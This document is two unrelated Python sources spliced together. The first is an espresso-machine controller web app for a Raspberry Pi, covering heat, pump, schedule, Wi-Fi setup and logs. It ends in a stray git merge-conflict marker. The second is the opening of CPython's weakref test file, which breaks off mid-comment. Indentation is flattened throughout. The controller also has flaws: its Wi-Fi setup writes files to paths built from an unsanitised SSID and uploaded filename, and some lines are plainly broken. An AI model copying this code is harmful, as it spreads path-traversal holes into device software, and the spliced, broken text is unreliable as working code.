def GET(self): # blocking receive
if (statusQ.full()): # remove old data
for i in range(statusQ.qsize()):
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
out = json.dumps({"temp" : temp, "elapsed" : elapsed, "mode" : mode, "cycle_time" : cycle_time, "duty_cycle" : duty_cycle,
"set_point" : set_point, "k_param" : k_param, "i_param" : i_param, "d_param" : d_param, "pump" : mem.flag_pump_on})
return out
def POST(self):
pass
@staticmethod
def get_temp():
if (statusQ.full()): # remove old data
for i in range(statusQ.qsize()):
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
temp, elapsed, mode, cycle_time, duty_cycle, set_point, k_param, i_param, d_param = web.ctx.globals.statusQ.get()
out = json.dumps({"temp" : temp, "elapsed" : elapsed, "mode" : mode, "cycle_time" : cycle_time, "duty_cycle" : duty_cycle,
"set_point" : set_point, "k_param" : k_param, "i_param" : i_param, "d_param" : d_param, "pump" : mem.flag_pump_on})
return out["temp"]
class echo:
def GET(self):
mystring = "{}"
try:
with open("echo.json") as f:
filecontents = json.load(f)
mystring = json.dumps(filecontents)
except (IOError, ValueError):
open("echo.json", 'a').close()
return render.echo(mystring) # a JSON object (string) at this point
def POST(self):
data = web.data() # web.input gives back a Storage < > thing
mydata = json.loads(data)
echoUserId = ""
try:
for datalistkey in mydata:
logger.debug("datalistkey = " + str(datalistkey))
if datalistkey == "userId":
echoUserId = mydata[datalistkey]
logger.debug("Echo userId changing to " + str(mydata[datalistkey]))
with open("echo.json") as saveFile:
try:
my_settings = json.load(saveFile)
except ValueError:
my_settings = json.loads("{}")
my_settings['userId'] = echoUserId
logger.debug("Echo config updating: " + str(mydata))
with open("echo.json", "wb") as output_file:
json.dump(my_settings, output_file)
return json.dumps("OK")
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class settings:
def GET(self):
with open("settings.json") as f:
filecontents = json.load(f)
return render.settings(json.dumps(filecontents)) # a JSON object (string) at this point
def POST(self):
data = web.data() # web.input gives back a Storage < > thing
mydata = json.loads(data)
for datalistkey in mydata:
logger.debug("datalistkey = " + str(datalistkey))
if datalistkey == "temp":
param.set_point = int(mydata[datalistkey])
logger.debug("temp changed to " + str(mydata[datalistkey]))
if datalistkey == "brewSecs":
mem.brew_time = int(mydata[datalistkey])
logger.debug("brew secs changed")
if datalistkey == "soakSecs":
mem.presoak_time = int(mydata[datalistkey])
logger.debug("soak secs changed")
if datalistkey == "waitSecs":
mem.wait_time = int(mydata[datalistkey])
logger.debug("wait secs changed")
logger.debug("Settings updated: " + str(mydata))
settings.save()
@staticmethod
def load():
with open("settings.json") as loadFile:
my_settings = json.load(loadFile)
mem.brew_time = my_settings["brewSecs"]
mem.presoak_time = my_settings["soakSecs"]
mem.wait_time = my_settings["waitSecs"]
param.set_point = my_settings["temp"]
param.k_param = my_settings["p_value"]
param.i_param = my_settings["i_value"]
param.d_param = my_settings["d_value"]
@staticmethod
def save():
with open("settings.json") as saveFile:
my_settings = json.load(saveFile)
my_settings['brewSecs'] = mem.brew_time
my_settings['soakSecs'] = mem.presoak_time
my_settings['waitSecs'] = mem.wait_time
my_settings['temp'] = param.set_point
my_settings['p_value'] = param.k_param
my_settings['i_value'] = param.i_param
my_settings['d_value'] = param.d_param
logger.debug("About to save settings = " + str(my_settings))
with open("settings.json", "wb") as output_file:
json.dump(my_settings, output_file)
class ispresso:
def GET(self):
return render.ispresso()
def POST(self):
op = ""
flag = ""
data = web.data()
datalist = data.split("&")
for item in datalist:
datalistkey = item.split("=")
if datalistkey[0] == "operation":
op = datalistkey[1]
if datalistkey[0] == "flag":
flag = datalistkey[1]
if str(op).upper() == "HEAT":
if flag == "on":
tellHeatProc("auto")
else:
tellHeatProc("off")
elif str(op).upper() == "PUMP":
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
logger.debug("Caught POST, Pump button. brewing ... " + str(brew_plan))
mem.brew_connection.send([time_stamp, brew_plan])
def brew(self):
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
logger.debug("called brew method ... " + str(brew_plan))
mem.brew_connection.send([time_stamp, brew_plan])
def scheduled_mode(old_mode):
try:
now = datetime.now()
today = datetime.isoweekday(datetime.now())
if today == 7:
today = 0
if mem.cache_day is None or mem.cache_day != today: # refresh cache, reset flags, turn off heat
logger.debug("scheduled_mode: cache flush or new day. resetting flags, turning off heat.")
mem.cache_day = today
mem.sched_flag_off = False
mem.sched_flag_on = False
with open("schedule.json") as f:
my_schedule = json.load(f) # t= time.strptime("00:05:42.244", "%H:%M:%S")
mem.cache_start_time = my_schedule['days'][today]['time']['startTime']
mem.cache_start_time = now.replace(hour=int(mem.cache_start_time.split(":")[0]), minute=int(mem.cache_start_time.split(":")[1]))
mem.cache_end_time = my_schedule['days'][today]['time']['endTime']
mem.cache_end_time = now.replace(hour=int(mem.cache_end_time.split(":")[0]), minute=int(mem.cache_end_time.split(":")[1]))
return "off"
if now < mem.cache_start_time:
return old_mode
if now > mem.cache_start_time and now < mem.cache_end_time:
if mem.sched_flag_on:
return old_mode
else: # start flag NOT set
mem.sched_flag_on = True # set flag
logger.debug("scheduled_mode: going AUTO")
return "auto"
if now > mem.cache_end_time:
if mem.sched_flag_off:
return old_mode
else: # end flag NOT set
mem.sched_flag_off = True # set end flag
logger.debug("scheduled_mode: going OFF")
return "off"
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class setup:
def GET(self):
try:
mySsidList = setup.get_ssid_list()
return render.setup(mySsidList)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def POST(self): # catch the inputs, put them into a config file, then call a shell script
try:
input = web.input()
protocol = input.protocol
ssid = input.ssid
passwd = input.passwd
if protocol == "personal":
logger.debug("doing config for WPA personal. ssid = " + ssid)
with open('/var/www/setup/interfaces_default', 'r') as file:
lines = file.readlines()
for idx, line in enumerate(lines):
if line.find("wpa-ssid") > -1:
lines[idx] = ' wpa-ssid "' + ssid + '"\n'
if line.find("wpa-psk") > -1:
lines[idx] = ' wpa-psk "' + passwd + '"\n'
if line.find("pre-up") > -1:
lines[idx] = ' # pre-up wpa_supplicant \n'
if line.find("post-down") > -1:
lines[idx] = ' # post-down # wpa_supplicant \n'
with open('/var/www/setup/ssid/' + ssid + '/interfaces', 'w') as file:
file.writelines(lines)
subprocess.call("/var/www/setup/default.sh 2>&1 >> /var/log/smartconnect.log", shell=True) # , Shell=True
elif protocol == "enterprise":
mycert = web.input(ca_cert={})
filename = ""
filedir = '/etc/certs/' # change this to the directory you want to store the file in.
if 'ca_cert' in mycert: # to check if the file-object is created
filepath = mycert.ca_cert.filename.replace('\\', '/') # replaces the windows-style slashes with linux ones.
filename = filepath.split('/')[-1] # splits the and chooses the last part (the filename with extension)
filename = filedir + filename # put together with my path
fout = open(filename, 'w') # creates the file where the uploaded file should be stored
fout.write(mycert.ca_cert.file.read()) # writes the uploaded file to the newly created file.
fout.close() # closes the file, upload complete.
logger.debug("SETUP: Enterprise - cert file written: " + filename)
with open ('/var/www/setup/interfaces_default', 'r') as file:
lines = file.readlines()
for idx, line in enumerate(lines):
if line.find("wpa-ssid") > -1:
lines[idx] = ' wpa-ssid "' + ssid + '"\n'
if line.find("wpa-psk") > -1:
lines[idx] = '# wpa-psk \n' # commenting out the PSK line for Enterprise, we're going to do wpa-supplicant instead
if line.find("pre-up") > -1:
lines[idx] = ' pre-up wpa_supplicant -B -Dwext -i wlan0 -c/etc/wpa_supplicant/wpa_supplicant.conf -f /var/log/wpa_supplicant.log \n'
if line.find("post-down") > -1:
lines[idx] = ' post-down killall -q wpa_supplicant \n'
with open('/var/www/setup/ssid/' + ssid + '/interfaces', 'w') as file:
file.writelines(lines)
with open ('/var/www/setup/wpa_supplicant.conf', 'r') as file:
lines = file.readlines()
for idx, line in enumerate(lines):
if line.find(" ssid") > -1: # need the trailing space so it doesnt squash scan_ssid field
lines[idx] = ' ssid="' + ssid + '"\n'
if line.find("key_mgmt") > -1:
lines[idx] = ' key_mgmt=' + input.key_mgmt + '\n'
if line.find("pairwise") > -1:
lines[idx] = ' pairwise=' + input.pairwise + '\n'
if line.find("group") > -1:
lines[idx] = ' group=' + input.group + '\n'
if line.find("psk") > -1:
lines[idx] = ' psk="' + input.psk + '"\n'
if line.find("eap") > -1:
lines[idx] = ' eap=' + input.eap + '\n'
if line.find("identity") > -1:
lines[idx] = ' identity="' + input.identity + '"\n'
if line.find("password") > -1:
lines[idx] = ' password="' + passwd + '"\n'
if line.find("ca_cert=") > -1 : # need the trailing = so it doesn't squash ca_cert2 field
lines[idx] = ' ca_cert="' + filename + '"\n'
with open('/var/www/setup/ssid/' + ssid + '/wpa_supplicant.conf', 'w') as file:
file.writelines(lines)
subprocess.call("/var/www/setup/default.sh 2>&1 >> /var/log/smartconnect.log", shell=True) # , Shell=True
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
@staticmethod
def get_ssid_list():
try:
iwlist_cmd = "iwlist wlan0 scanning | grep ESSID"
proc = subprocess.Popen(iwlist_cmd, shell=True, stdout=subprocess.PIPE)
myNwList = []
while True:
line = proc.stdout.readline()
if line != '':
line = line[line.find('"') + 1 : len(line) - 2]
myNwList.append(line)
else:
break
return myNwList
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def get_immediate_subdirectories(a_dir):
return [name for name in os.listdir(a_dir)
if os.path.isdir(os.path.join(a_dir, name))]
@staticmethod
def check_connected(): # assumes we have a wifi configuration in place in /etc/network/interfaces and we want to test it
try:
url = "http://google.com"
response = requests.get(url)
return True
except:
pass
return False
@staticmethod
def wifi_connect():
try:
if setup.check_connected():
return True
my_ssid_list = setup.get_ssid_list()
my_subdir_list = setup.get_immediate_subdirectories("/var/www/setup/ssid/")
for ssid in my_ssid_list: # need to compare lists, and try out each one that matches
if ssid in my_subdir_list: # attempt connection - move file(s) into place, and recycle ifdown & ifup
logger.debug("wifi_connect: trying ssid = " + ssid)
shutil.copy2("/var/www/setup/ssid/" + ssid + "/interfaces", "/etc/network/interfaces")
if os.path.isfile("/var/www/setup/ssid/" + ssid + "/wpa_supplicant.conf"):
shutil.copy2("/var/www/setup/ssid/" + ssid + "/wpa_supplicant.conf", "/etc/wpa_supplicant/wpa_supplicant.conf")
my_cmd = "sudo ifdown wlan0 && sudo ifup wlan0"
proc = subprocess.Popen(my_cmd, shell=True, stdout=subprocess.PIPE)
if check_connected():
return True
return False
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
@staticmethod
def smart_connect():
logger.debug("Calling SmartConnect setup.sh")
subprocess.call("/var/www/setup/smartconnect.sh 2>&1 >> /var/log/smartconnect.log", shell=True)
class schedule:
def GET(self):
with open("schedule.json") as f:
filecontents = json.load(f)
return render.schedule(json.dumps(filecontents), str(datetime.now())) # a JSON object (string) at this point
def POST(self):
data = web.data() # web.input gives back a Storage < > thing
mydata = json.loads(data)
with open("schedule.json") as f:
my_schedule = json.load(f)
week = {'Sunday':0, 'Monday':1, 'Tuesday':2, 'Wednesday':3, 'Thursday':4, 'Friday':5, 'Saturday':6}
my_schedule['days'][week[mydata['day']]]['time']['startTime'] = mydata['time']['startTime']
my_schedule['days'][week[mydata['day']]]['time']['endTime'] = mydata['time']['endTime']
tellHeatProc(None, True) # FLUSH the cache so that the other process picks up the changes
with open("schedule.json", "wb") as output_file:
json.dump(my_schedule, output_file)
return json.dumps("OK")
def tempdata():
try:
one_wire = mem.one_wire # gets set below, on init "/sys/bus/w1/devices/28-000004e0badb/w1_slave"
pipe = Popen(["cat", one_wire], stdout=PIPE)
result = pipe.communicate()[0]
result_list = result.split("=")
try:
temp_C = float(result_list[-1]) / 1000 # temp in Celcius
except ValueError: # probably means we can't read the 1-wire sensor
# logger.warn('Could not get a value from 1-wire connector. Using ' + one_wire )
temp_C = 0
return temp_C
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
def catchButton(btn): # GPIO
try:
time.sleep(0.05)
if GPIO.input(btn) != GPIO.HIGH: # check to see if the input button is still high, protect against EMI false positive
return
if (GPIO.input(gpio_btn_heat_sig) == GPIO.HIGH & GPIO.input(gpio_btn_pump_sig) == GPIO.HIGH): # both buttons pressed
mem.lcd_connection.send(["Live long", "and prosper!", 1]) # easter egg
mem.lcd_connection.send(["iSPRESSO", "", 0]) # easter egg
logger.info("You found an easter egg!")
return
if btn == gpio_btn_heat_sig:
now = time.time()
if now - mem.time_heat_button_pressed < 1:
mem.time_heat_button_pressed = now
return
mem.time_heat_button_pressed = now
if param.mode == "off":
GPIO.output(gpio_btn_heat_led, GPIO.HIGH) # this is a bit of a hack because the temp control also regulates the LED but putting it here gives better user experience.
logger.debug("catchButton: telling Heat Proc AUTO (ON) ")
tellHeatProc("auto")
else:
GPIO.output(gpio_btn_heat_led, GPIO.LOW)
logger.debug("catchButton: telling Heat Proc OFF")
tellHeatProc("off")
elif btn == gpio_btn_pump_sig:
logger.debug("catchButton: telling Brew Proc (toggle)")
time_stamp = time.time()
brew_plan = [['Presoak', mem.presoak_time], ['Wait', mem.wait_time], ['Brew', mem.brew_time]]
mem.brew_connection.send([time_stamp, brew_plan])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
class logdisplay:
def GET(self):
fp = open('/var/log/ispresso.log', 'rU') # reading file from file path
text = fp.read() # no problem found till this line.
fp.close()
return render.logdisplay(text) # calling file_display.html
def cleanUp():
logger.info("Shutting down...")
mem.lcd_connection.send(["iSPRESSO", "Shutting down", 0])
execfile ('shutdown.py')
if __name__ == '__main__':
try:
logger_init()
os.chdir("/var/www")
call(["modprobe", "w1-gpio"])
call(["modprobe", "w1-therm"])
base_dir = '/sys/bus/w1/devices/'
try:
base_dir = glob.glob(base_dir + '3b*')[0]
except:
logger.error("EPIC FAIL! 1-Wire Temp sensor not found in " + base_dir)
mem.one_wire = base_dir + '/w1_slave'
urls = ("/", "ispresso", "/settings", "settings", "/schedule", "schedule", "/advanced", "advanced", "/getstatus", "getstatus", "/logdisplay", "logdisplay", "/setup", "setup", "/echo", "echo")
render = web.template.render("/var/www/templates/")
app = web.application(urls, globals())
atexit.register(cleanUp)
statusQ = Queue(2)
parent_conn, child_conn = Pipe()
#lcd_parent_conn, lcd_child_conn = Pipe()
#mem.lcd_connection = lcd_parent_conn
initialize()
cloud_parent_conn, cloud_child_conn = Pipe()
mem.cloud_connection = cloud_parent_conn
brew_parent_conn, brew_child_conn = Pipe()
mem.brew_connection = brew_parent_conn
global_vars = globalvars()
GPIO.add_event_detect(gpio_btn_heat_sig, GPIO.RISING, callback=catchButton, bouncetime=250)
GPIO.add_event_detect(gpio_btn_pump_sig, GPIO.RISING, callback=catchButton, bouncetime=250) # was RISING, at one point HIGH. who knows
#mem.heat_connection = parent_conn
#lcdproc = Process(name="lcdControlProc", target=lcdControlProc, args=(lcd_child_conn,))
#lcdproc.start()
brewproc = Process(name="brewControlProc", target=brewControlProc, args=(brew_child_conn,))
brewproc.start()
cloudproc = Process(name="cloudControlProc", target=cloudControlProc, args=(global_vars, brew_parent_conn,))
cloudproc.start()
p = Process(name="tempControlProc", target=tempControlProc, args=(global_vars, param.mode, param.cycle_time, param.duty_cycle, \
param.set_point, param.k_param, param.i_param, param.d_param, statusQ, child_conn))
p.start()
app.add_processor(add_global_hook(parent_conn, statusQ))
app.run()
except KeyboardInterrupt:
cleanUp()
sys.exit()
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
logger.error(''.join('!! ' + line for line in traceback.format_exception(exc_type, exc_value, exc_traceback)))
cleanUp()
sys.exit()
if mem.scheduler_enabled: # if program is just been started, set the mode according to the schedule, assuming schedule is ON
tellHeatProc("auto")
>>>>>>> 36eea33d49a0e858fe8d4577f016370597e1bb55
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper, ALWAYS_EQ
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_proxy_iter(self):
# Test fails with a debug build of the interpreter
# (see bpo-38395).
obj = None
class MyObj:
def __iter__(self):
nonlocal obj
del obj
return NotImplemented
obj = MyObj()
p = weakref.proxy(obj)
with self.assertRaises(TypeError):
# "blech" in p calls MyObj.__iter__ through the proxy,
# without keeping a reference to the real object, so it
# can be killed in the middle of the call
"blech" in p
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
